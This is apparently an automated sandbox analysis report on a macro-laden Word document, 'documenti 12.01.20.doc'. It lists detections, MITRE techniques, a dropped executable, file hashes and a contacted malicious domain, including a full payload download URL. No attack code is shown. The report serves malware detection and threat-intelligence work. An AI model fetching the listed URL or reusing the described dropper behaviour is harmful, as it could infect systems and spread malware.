Analysis Report documenti 12.01.20.doc
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: BlueMashroom DLL Load | Show sources |
Source: | Author: Florian Roth: |
Sigma detected: Regsvr32 Anomaly | Show sources |
Source: | Author: Florian Roth: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Machine Learning detection for sample | Show sources |
Source: | Joe Sandbox ML: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: AutoOpen |
Source: | OLE, VBA macro line: |
Source: | OLE indicator, VBA macros: |
Source: | OLE indicator has summary info: |
Source: | OLE indicator application name: |
Source: | Dropped File: |
Source: | Key opened: | Jump to behavior |
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | Command line argument: | 1_2_00B31460 | |
Source: | Command line argument: | 1_2_00B31460 | |
Source: | Command line argument: | 1_2_00B31460 |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 1_2_00B31460 |
Source: | Code function: | 1_2_00B320A4 |
Persistence and Installation Behavior: |
---|
Creates processes via WMI | Show sources |
Source: | WMI Queries: |
Drops PE files with a suspicious file extension | Show sources |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | File opened / queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 1_2_00B31460 |
Source: | Code function: | 1_2_00B31F11 |
Source: | Process created: | Jump to behavior |
Source: | Code function: | 1_2_00B31DC3 |
Source: | Code function: | 1_2_00B31460 |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation11 | DLL Side-Loading1 | Process Injection11 | Masquerading211 | OS Credential Dumping | System Time Discovery1 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Command and Scripting Interpreter2 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Virtualization/Sandbox Evasion2 | LSASS Memory | Security Software Discovery11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Scripting2 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Virtualization/Sandbox Evasion2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | Native API1 | Logon Script (Mac) | Logon Script (Mac) | Scripting2 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Exploitation for Client Execution13 | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Information Discovery6 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
29% | Virustotal | Browse | ||
100% | Joe Sandbox ML |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Metadefender | Browse | ||
0% | ReversingLabs |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
nfj254aim.com | 104.28.6.227 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.28.6.227 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 326338 |
Start date: | 03.12.2020 |
Start time: | 10:11:18 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 51s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documenti 12.01.20.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 23 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal88.expl.winDOC@4/13@1/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\Public\ms.com | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 13312 |
Entropy (8bit): | 4.926696656173964 |
Encrypted: | false |
SSDEEP: | 192:ohs5YZgW7BXxaQbmpi/Dago+Mz8FDe2WwqrIRbW3oo:9kBXxfmpimR78E2WwqIWYo |
MD5: | 7083239CE743FDB68DFC933B7308E80A |
SHA1: | 274216860964AF5ACDCE5F7BD508F69C98FA55B2 |
SHA-256: | CBAB3546BDDB2E4EA340C1A7DF680DA6C4F4F2F18B8E98F6D4B66926183E269E |
SHA-512: | 8047FCAB5D3A35A405661C72879D6EBCF3EF2AFE7486649F0BBC43FA59E898A9E37A998940764422E1AB0AE066B3E45132D67CAB963B9BF3C44BC3EC8D4EDC6D |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 17904 |
Entropy (8bit): | 5.221943493256307 |
Encrypted: | false |
SSDEEP: | 192:eBZQiLCb1hint4zdt1e870k0hs70k0C2qNXl6qJExTxvYj0lXUZIeYsa3UKh73uy:e3QYnadWs4TxYI2ZHeM7MQc |
MD5: | 7F908F1EE0BBB0B276589F06368A008D |
SHA1: | EE9D0FA4C45AEB9C75750AA003E7C0F0F22E348D |
SHA-256: | 8B23A9189FD2FE4CC89459224ED36E7A64121DE9589D3AC9CEAE9E4DEEF7F23A |
SHA-512: | 3FBEBBCD1B5F2A731470037A702BA58EEFBC0764874D465539E90B6FCD4BA16E93221E8EB402BF2D3B603A6B4D81E3B1A2E68EA3625A93716F4EF991FA625633 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 130058 |
Entropy (8bit): | 5.378006827606677 |
Encrypted: | false |
SSDEEP: | 1536:6cQceNWrA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:hmQ9DQW+zBX8u |
MD5: | F28073F5D9517A703D6F836C06E3BD72 |
SHA1: | F3D940A80A311EFCD0E05027AEC396B477CD3390 |
SHA-256: | 2BF2B6CB402BBEB2DF6D7C17F4F26FADFF892B82B46848B2A1D07815FFAFC3CF |
SHA-512: | 093D18E703EB29CC96B81E62CF1C242FB9DDEEFE2011A1853F08A1B25B2BB9C2E9E857BE754DE016C0507A14C904AAC9B8C0952F43C160BD45643BA1769FC5A3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 57258 |
Entropy (8bit): | 7.900983242117529 |
Encrypted: | false |
SSDEEP: | 768:Nne7FOQKYij8iCi2EQrb4lF6j5UTFRHehGLOAFed/6CO2wPbttab/jz7Q+6fNsaw:Ne7Il+Oy4wUOAL2wPbnQ/Tz6CaCd |
MD5: | B44AC26E80A557B913B715F234C3D769 |
SHA1: | 1E0574649A9E5BBE0283D83A801E0E3EC4261BBC |
SHA-256: | 1EFAC6DE241D24814D7925C803E3ACBF4E2CD4A90FDE9C6826613DE2A8063B7B |
SHA-512: | 4349E729AEDC4E69A92432553C0BEA8CF5D4D92E7908F25DB5DF3E1B3628F74D362AFD15AED5EED12E53ABDFFAB44F81E39006C8C6FF4D242A05D45AFFA08E5D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:X:X |
MD5: | 32649384730B2D61C9E79D46DE589115 |
SHA1: | 053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4 |
SHA-256: | E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB |
SHA-512: | A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 0.3796147056131488 |
Encrypted: | false |
SSDEEP: | 3:9l3lli4wltfSP8lFllItEMAWuWy:kFSP8gtEMAWpy |
MD5: | 39F0255F9BB41BD49E765898D326FB77 |
SHA1: | 8AD67EEB7CF2ED4CA7DD1AF586406DE92113C6F1 |
SHA-256: | 7DB4A7FAFE19900A941F5EC134454C4769D6D1F8227A176A3CEBD9F3C7D86056 |
SHA-512: | 6FD2E6037C25B4EC5D091B9E2C3F2E9EC04FC3A59AFD79D980ED0E11FFEEFBA18EA535B1C0443A01BC50C5AED4C4F1150B0487B89CE35B2B440D323B40592B28 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Users\Public\ms.com |
File Type: | |
Category: | downloaded |
Size (bytes): | 205 |
Entropy (8bit): | 5.155240244937957 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T |
MD5: | 6C598B85477C948D2A6C50AB26631415 |
SHA1: | 429CE2C54B01450B0250D423F08886A0F6B567DB |
SHA-256: | 04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4 |
SHA-512: | 9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA |
Malicious: | false |
Reputation: | low |
IE Cache URL: | http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz |
Preview: |
|
Process: | C:\Users\Public\ms.com |
File Type: | |
Category: | dropped |
Size (bytes): | 205 |
Entropy (8bit): | 5.155240244937957 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T |
MD5: | 6C598B85477C948D2A6C50AB26631415 |
SHA1: | 429CE2C54B01450B0250D423F08886A0F6B567DB |
SHA-256: | 04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4 |
SHA-512: | 9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2190 |
Entropy (8bit): | 4.712055572834122 |
Encrypted: | false |
